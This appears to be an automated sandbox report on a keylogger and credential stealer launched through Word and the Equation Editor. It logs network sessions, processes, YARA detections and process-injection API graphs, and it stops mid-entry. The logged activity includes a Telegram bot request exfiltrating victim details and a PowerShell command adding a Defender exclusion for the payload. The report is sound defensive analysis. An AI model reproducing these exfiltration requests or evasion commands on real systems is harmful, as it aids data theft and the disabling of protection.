                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.22 | 49165 | 188.114.97.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:11 UTC | 682 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 343
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mu2szc4b%2FvapzqbI8Up%2F%2BaIT2K3lZU%2FRtsXYlVYsN3fANNPQYUdq%2FThKg5pO6%2BJJF3H7K27yeb3NWO0mmC6z8kGUPe1X9xK9fkSRFKorBFUXew%2ByRJibynwKX6cFrYxRaCiOHSrB"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c9184c26b1641ac-EWR
                                                2024-09-26 07:25:11 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:12 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 07:25:12 UTC | 704 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:12 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 344
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RxE7rVdRG34Q9Qzvyj5MMxJbmKvOikmoJsyeD6T%2BMZ0jPU%2B58M3d7xkUET2h4VA1ioNI%2Bpd9V7lOhPeUivcnLGRb5vCjE4P3CDPN6YUyXajIk9pjyWX8SN6uTE1D2zn8W9LEKD0"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c9184c7990fc472-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-09-26 07:25:12 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.22 | 49169 | 188.114.96.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:23 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:23 UTC | 680 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 355
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq5Khe9OpstVaq%2BCjVcY%2BGvp09kMcRh6Fne6MhcDlll0zUtSTL%2FfCi6qI4mN9eKlhiBFcI48%2FMgbvY0MrXicszoqUNY0IL2d%2Fqsgq0jwHx9GjIx81g4tochzvjQq2qn05108PA%2B6"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91850ed9d343cf-EWR
                                                2024-09-26 07:25:23 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.22 | 49171 | 188.114.96.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:28 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 360
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyYeT0MxH4U6szGAcrRenDaKf84UGPCe%2B%2BX%2FL0pJe%2Bn7pqBMCwIRXe3dft9BotLUopcVB8dACcXFyiybl1fHBLBrJxhjlBU2oahM755B%2BmA95BWp14o7GTf8zFKyhoHiWoayQMJH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91852deb998cbd-EWR
                                                2024-09-26 07:25:28 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.22 | 49173 | 188.114.97.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:29 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-09-26 07:25:29 UTC | 672 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 361
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts4GwULEUS86aH0jsLHritAqM5XJVsg8e6dpR0UqJPvXLJuCbGvXrLSFHn6mSyzBf6OlyyPkimpjlaAdAEfetk3R0AEcUSH8IwwY%2F%2Fagr7b7PA5qfnocPX9HMgs9aIioPgS2ph8z"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c918535ec569e08-EWR
                                                2024-09-26 07:25:29 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.22 | 49177 | 188.114.96.3 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:38 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:38 UTC | 682 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 07:25:38 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 370
                                                Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9Mkes%2BGkIDbPP86M7vaU1BSBX5M5cEp7EKQKP51bnd7VPjphKamanod5ue3mYhe%2BFoHVD5YGtArpGq3%2F8itFuB9rx1YGJHMw%2FrasYqrl%2FhQNGd54WsBkQkvwgVSX%2Fryzo%2FRAa32"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c91856d29ca42bf-EWR
                                                2024-09-26 07:25:38 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-09-26 07:25:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.22 | 49178 | 149.154.167.220 | 443 | 3520 | C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-26 07:25:40 UTC | 353 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:609290%0D%0ADate%20and%20Time:%209/27/2024%20/%2010:16:15%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20609290%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-09-26 07:25:40 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Thu, 26 Sep 2024 07:25:40 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-09-26 07:25:40 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Target ID:0
                                                Start time:03:24:55
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f080000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:2
                                                Start time:03:24:56
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:03:25:01
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 29%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x1f0000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:10
                                                Start time:03:25:22
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:15.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd

                                                  Control-flow Graph for function at 17c525
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017C7F7
                                                  Strings
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: 44#$44#$44#
                                                  • API String ID: 963392458-78978932

                                                  Control-flow Graph for function at 17c530
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017C7F7
                                                  Strings
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: 44#$44#$44#
                                                  • API String ID: 963392458-78978932

                                                  Control-flow Graph for function at 17c190
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C26B
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0

                                                  Control-flow Graph for function at 17c198
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C26B
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0

                                                  Control-flow Graph for function at 17c2f1
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C3AA
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 243 17c2f8-17c3c0 ReadProcessMemory 246 17c3c2-17c3c8 243->246 247 17c3c9-17c41b 243->247 246->247
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C3AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6f6c656cb0635ab6d11f7a011003b681580bb39363b6cdcd4ee564a18dcda550
                                                  • Instruction ID: e43d59495aaf410ba73d890745e5d0e6c01d20235f78002697dd770a1ff3420d
                                                  • Opcode Fuzzy Hash: 6f6c656cb0635ab6d11f7a011003b681580bb39363b6cdcd4ee564a18dcda550
                                                  • Instruction Fuzzy Hash: 9641BAB4D00258DFCF10CFA9D884AEEFBB1BB49310F20942AE814B7200D735A945CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 252 17c068-17c130 VirtualAllocEx 256 17c132-17c138 252->256 257 17c139-17c183 252->257 256->257
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0017C11A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: b4b54691507be7f497d6f4a202edf7038558add10e0a71b46185e7cb410d2353
                                                  • Instruction ID: d3301fb3c541b9be4e70699a3f8a856f738b14c80363bb6438ee42e01e96a17b
                                                  • Opcode Fuzzy Hash: b4b54691507be7f497d6f4a202edf7038558add10e0a71b46185e7cb410d2353
                                                  • Instruction Fuzzy Hash: 7F4188B9D00258DFCF10CFA9D985A9EBBB5BB49310F24942AE814BB210D735A905CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 262 17c070-17c130 VirtualAllocEx 265 17c132-17c138 262->265 266 17c139-17c183 262->266 265->266
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0017C11A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 19f65d01af398c527539dd94fd259d92afff5d6884fe7dd34145917e6043f4af
                                                  • Instruction ID: db572cdbc3fa1bb51cba3ac477ea08b7f6f5368c752453e43521bad89914a549
                                                  • Opcode Fuzzy Hash: 19f65d01af398c527539dd94fd259d92afff5d6884fe7dd34145917e6043f4af
                                                  • Instruction Fuzzy Hash: 314199B8D00258DFCF10CFA9D984ADEFBB5BB49310F20942AE814B7210D735A905CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 17bf39-17bfa0 274 17bfb7-17c005 Wow64SetThreadContext 271->274 275 17bfa2-17bfb4 271->275 277 17c007-17c00d 274->277 278 17c00e-17c05a 274->278 275->274 277->278
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017BFEF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 2b97f20ef2e9cad3549f55cfb0ce60e1042d73f849d14026bae0879a600f17f8
                                                  • Instruction ID: e4aaa7b462178574ee1ec621054413d894f5819c0bc5bd11a6b67a3b22d4a1fc
                                                  • Opcode Fuzzy Hash: 2b97f20ef2e9cad3549f55cfb0ce60e1042d73f849d14026bae0879a600f17f8
                                                  • Instruction Fuzzy Hash: 6F41BDB5D00258DFDB10CFA9D984AEEFBB5BF49310F24802AE818B7240D778A945CF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 17bf40-17bfa0 285 17bfb7-17c005 Wow64SetThreadContext 283->285 286 17bfa2-17bfb4 283->286 288 17c007-17c00d 285->288 289 17c00e-17c05a 285->289 286->285 288->289
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017BFEF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 52f5495832678101ea200269544d53e48e3196830ae3ed99862a7a9fd055023d
                                                  • Instruction ID: 1754b1f69cc0087f4c6f368d91dba1a0f35bbdcadd09a8942d54a9bf74abd14e
                                                  • Opcode Fuzzy Hash: 52f5495832678101ea200269544d53e48e3196830ae3ed99862a7a9fd055023d
                                                  • Instruction Fuzzy Hash: AC41BDB4D00258DFDB14CFA9D984AEEFBB5BF49314F24802AE818B7240D779A945CF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 17be48-17bee4 ResumeThread 297 17bee6-17beec 294->297 298 17beed-17bf2f 294->298 297->298
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: eace36eb03b6e5703a97dc8d26c01d2361005f662b1778cde42a8c1ea6cab0cb
                                                  • Instruction ID: 270b2a8d871ed9adb63e3f9edfa6083eb025222e95fba3d809297eb803b8b020
                                                  • Opcode Fuzzy Hash: eace36eb03b6e5703a97dc8d26c01d2361005f662b1778cde42a8c1ea6cab0cb
                                                  • Instruction Fuzzy Hash: CA31D9B4D042589FDF14CFA9D884AEEFBB0AF49310F24942AE819B7300D775A905CF95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 1747e08ea4903e2e0211094ab7d590311e80ee6ce9271d989500017a00887296
                                                  • Instruction ID: 68dcdf636066b2385f3b33529c57650acf7c335b21497d2891088e66bccfa444
                                                  • Opcode Fuzzy Hash: 1747e08ea4903e2e0211094ab7d590311e80ee6ce9271d989500017a00887296
                                                  • Instruction Fuzzy Hash: 5631B9B4D002189FDF14CFA9D984AEEFBB5AB49310F24942AE818B7300D775A905CFA4

                                                  Execution Graph

                                                  Execution Coverage:5.8%
                                                  Dynamic/Decrypted Code Coverage:83.6%
                                                  Signature Coverage:15.1%
                                                  Total number of Nodes:73
                                                  Total number of Limit Nodes:0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e01946830a4de008a78b867efbd0615c7302b1e6511b0a3ed9a7409e66449c46
                                                  • Instruction ID: b06cd50d5d1591a6df42353bbbd3c45a2e1d4628213421a58730e88133fe1dbb
                                                  • Opcode Fuzzy Hash: e01946830a4de008a78b867efbd0615c7302b1e6511b0a3ed9a7409e66449c46
                                                  • Instruction Fuzzy Hash: 77F1E474E01218CFDB14DFA9C884B9DFBB2BF98304F5485A9E808AB355DB74A985CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
